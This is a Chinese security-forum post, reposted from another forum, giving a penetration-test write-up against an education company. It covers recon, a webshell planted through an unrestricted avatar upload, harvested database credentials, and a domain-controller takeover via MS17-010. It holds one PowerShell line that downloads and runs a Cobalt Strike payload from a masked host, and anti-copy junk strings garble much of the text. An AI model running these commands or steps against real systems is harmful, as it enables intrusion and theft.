找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2127|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

0 x" X9 G2 h. B9 J5 J 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 7 D) J' ? w/ T# ^

5 I' ~" c: r. [# Y9 }6 ^

$ _, k4 w& X9 Q; }6 C9 D2 P6 K   3 q5 `! k5 [. M# f) r1 s' y

7 y) y0 a+ z7 g* S% l& U# R; l

2 N( z8 ]' D$ T3 |, O( s 正文 ( F1 C4 Y" {9 Z

3 i# F# {$ v5 t

+ Z3 }6 c0 ]' Q, E   5 [( H0 f$ j+ n4 j* R# p7 y

7 ] {7 I5 c0 P* u6 N/ a

: J/ f) `' @) {, J, J% f. v T 目标:www.xxxx.com(一家教育机构)
2 I Q- o7 ]- b
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
/ `* X( {0 J7 `! L# s- m

n$ ^* e: [5 W6 O/ \

; w3 S2 _& V9 D4 V vshapes=- v! S% N& N* A: R: W8 a

6 z; O2 Z2 q1 h* O

& \1 Z) b) O5 p6 J 进行了简单的信息搜集
6 \. T6 V8 Z$ ?% p$ U/ S' p) b* g+ B, G
( \5 F3 X3 P2 h* Q
9 N0 |, A+ ?8 ^: x

6 {" [. o) }! x1 K# j+ Y g

! B) H' `2 T8 a5 x 子域名搜集( W4 G* j8 X. a0 s9 K$ k: O/ T- q

8 x v4 s/ k [2 D2 B# Z

- S. A4 d- M, b, n5 G+ E! y1 r. G vshapes=1 h ?. Q4 Z S

( O2 _! Q: ]- }3 [/ I2 \8 e. s

, y4 P4 i$ n5 \) B fofa找资产
' a7 h$ W8 `/ \) w" C
% u ~! d9 ~% f" F3 t
; x1 u6 u/ d; n- A4 A8 W6 C

+ x0 g0 e. W1 L" u9 T% I y( |

! D) z/ ~" {1 ~$ B vshapes=4 Z: J' _1 n2 |1 T

- l% c, Q% q' t( |. J* @

- L1 D$ d. X' U! G 一共七个资产。去重之后只有两个。
2 d& `# r0 R7 X. l _; ~
+ m# t5 s7 x B: H
# Y f% b; W7 q8 H$ o$ s9 z5 Q

+ {9 H" b3 N1 L0 v5 k

5 `0 u* T Q: k- G 目录探测 6 H* h$ m9 C; k0 s* G# q

. V* W9 v: u& H F( n) ]! w. `% Q6 Z

" L+ y$ @ g# h. @+ C: a vshapes=4 g. m4 X$ |5 [/ {+ L B

3 Z0 P& _- O5 G# F; q R

/ Z' E$ z- R A( u5 @! G" l3 O$ ? 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
0 |9 P/ _; {0 }
) l* W! u7 _; n; M- _# k$ q( q& L
5 }4 ~7 r1 }/ p4 a n' V

: ^+ @, z, ^6 [. x

, P1 y1 Q$ q3 x& n" A( R 我又尝试了通过修改返回包来绕过登录界面 7 V$ }; Z. P5 ^

9 H& O% v/ L; T+ e# q4 [

* X0 H% N! K2 t c+ {# J vshapes=, }1 b" O: r& G

& c7 h1 a2 @4 |' j

) g3 _9 U0 [; Y8 N. F4 \ 还是不行,尝试注入无果, ~3 `2 @* X# k: E

9 H0 H6 L/ N3 E& y* i: e2 I9 M

, Q1 g- g0 N; H vshapes=: H: [5 X# I, @" L3 c8 G- E( }

$ i3 D5 G' y# h! [( }: D: _

* N8 d) `, J& {9 W2 F! z7 k 不过我目录探测出了一处Spring信息泄露
* L" d5 x6 X6 [8 u6 l
) w% n/ y# y. n
/ e' D, H9 }! P; j0 M& N4 x( K

" K. S& w* a: a$ K' M

# X4 _+ h3 z% [0 e$ o1 C; x7 Y& S vshapes=: Z5 a! S, X/ S- V5 Y- a1 G1 T

0 k3 G# ?9 L- E5 t0 k& @6 h

8 l/ }( x& k/ b- i 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录0 T. D8 P" Y3 G8 E3 ]

( E9 o h+ J) X/ v# \* W6 E7 t

$ R& y+ |, i4 d- A% f1 a vshapes=& E% n x1 M3 n: v8 s1 o# L

' f$ F' q) l/ R1 Q! b' f

9 G- r4 c" K. ~7 H 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。. V- i; ]+ g& F1 X% {

8 z+ o A( c7 |

/ k+ j1 M! p; y' ] vshapes= C0 v4 X% f) C- b

6 O* e# W1 ~- e [! o

1 H+ M: k* p* }( n$ T 获取有些师傅到这一步就手机抓包电脑测了。& i: D3 l6 t, r& j" Q8 Z S2 }

V3 r( {* B& b* z: f5 m

8 p1 g9 H; N; @+ A" M/ k Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。7 L' I3 F) k3 t6 Z$ s1 y. w/ r

$ t+ v! A) }2 t% |9 Q) f* H4 ^* s

4 k" W" n4 P9 P. i7 w7 q 其中在一个公众号发现了小程序,可以进行注册。 4 i2 [9 L+ Z( x6 g2 F0 [+ A

. u. T+ @# N9 p8 @: Q

# Y' b) _* ]" b3 ~0 u# } \0 R8 @ F) }/ H 看到了头像上传,尝试上传获取WebShell! }" r% A* |& f# }" W6 x

; e. Y1 ~8 }' K1 I5 d

3 r: @5 \9 E% S, V( D8 _9 z) Y vshapes=7 b1 y& {/ j7 R3 r1 _ ?7 I

' E8 w& b- |8 X; R5 b' {* N# s

0 p* Z3 R- ^4 @$ ]; C% G6 K 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 , _3 p9 H5 R B1 l

( C% C% o& u% j- P& K$ v

7 v' e' b; U' d) _" M vshapes= ' c3 v! S, ?1 B$ @5 q

6 l* V" K" F) N- i2 ?

" G8 @ j7 }& z& M; t; h 然后上了大马 # ?( l* j' t" n! u$ c

+ j3 z: }' G8 _! o" v7 y& p

( D% X- _: k9 N* o! E vshapes=4 [/ o- D0 P& B

1 W5 s h- _! z3 N; }

( v- C! V! v: R# E, h2 X E vshapes=3 @/ U8 E+ _- T4 o* t* b8 ^. t

9 i0 B8 S" ^, S+ k& b0 e n

' X+ U- b1 L. N 通过翻找文件发现数据库账号密码4 F* ~5 u% h7 \# m& {" u

$ F8 ^) {- L8 ~3 x

+ Q+ `( R( Y% i$ a/ h8 a vshapes= ! g! w/ v$ R/ u2 _2 X% Z" {

! c7 a+ @! x4 {

* H/ ]( l6 e/ a( P9 y --内网渗透1 L4 h1 N6 B, u4 u

: G: _( W+ J" g( {) O

* P7 W5 _7 E+ N- H9 l L L2 Y 直接通过powershell执行 cs上线6 @! k. y) K" J0 n

2 U/ s$ W) |! K

" d; u1 J* m$ J* H powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" 8 W* J1 e' v, b

1 B) R! w# j5 @& b& \! H

& p9 ^! m Y- u vshapes=. ?1 G! M& M) W- N( @

+ \; c6 k9 X7 p; t* `+ l1 M

) Z& L! b# w. j/ s 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 & J7 n( O" S) _" a+ ^

: o* s. A. p7 \' Y% Q& m- r7 x

+ t' C6 ~9 v1 O# X3 Y/ T% o vshapes= 7 n0 n6 P# p8 g$ u# X" I1 Q

5 O; L/ n, ?' S4 S1 H0 r

4 Q) t' m+ ?4 @9 X+ V2 n 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
0 H. F8 P7 Z& g- h# S0 e
. l$ {& Z! e ~/ _8 ?) M d/ M
) g/ j. \- ^. h, W7 Q
6 q; X% h# f% @' Q, W2 g$ w

2 b* _4 `% Y3 `8 P: {) K! q" t

9 n7 e6 R, H6 y: c8 Q' d vshapes= * _1 q4 z y& G* ?+ w, x

* Q7 A# n7 c( Z" T: T

, F2 }+ ?0 f, e' V, c9 }. A' i: F 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
- b$ q$ V `. }. y! A* B. S8 B: Q
+ D! {8 M, t0 s& J
% z/ P: s) O% g

; G# Y$ F% Q$ `+ W* H) ~) B

' L& t5 ]/ d% y vshapes= # b" q$ h% y+ N6 u3 v$ k

* v/ ?9 h! B& |' d, o

! P* V8 F* r5 f. r
* X7 F4 N7 n( H6 H0 }
( ~8 o: ^5 h0 ^) p5 n, h6 H4 Q9 Z
T6 `3 k8 V6 o& Z7 N# B% |

* p/ z+ E. L0 O3 p

3 O! c. O! @2 s+ S! ]" U* P  - Q2 d# b# c( B9 P' q; h0 [

8 e+ r6 v" \) m

# \8 F9 a* o" r3 R$ m1 d' z 小结 % K8 W& {( G; R+ O

8 V/ R3 P" R: b m

4 r% u ~& e4 E6 q' S# J  + P) V* D$ j; W; Z a

- {5 {) e) ~3 R9 N! a

4 k$ I0 V% ^7 v7 H) [2 e0 K4 x 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!1 B5 O T0 c. L+ r, V7 _

/ z) v% U2 m6 J3 G

8 [1 l2 |0 @/ y" g# L   3 ]# z5 A+ G7 j2 ]

: q0 ?& d6 I' y+ {- ^2 M* L
    $ B3 K3 V( ?; P! a: }
  • & m T) e }! P6 V; \; j5 Y  . b, J1 s1 Q% J3 D1 p: H
  • ' }' M# @8 e! w
  • 8 \4 z e( M- S e  5 Q# p |/ { I: n
  • ; R# J' D. h% E& s3 Z- L/ X
& o G/ }8 ~5 r" q

: w0 a* C! i x 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html( P& B6 j5 g" Q$ ^/ J+ z6 W' H ?

0 K( C8 I' C1 W

! V5 |7 ?' J |! N- H1 d4 e* g  . u& g7 x3 o" o P

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表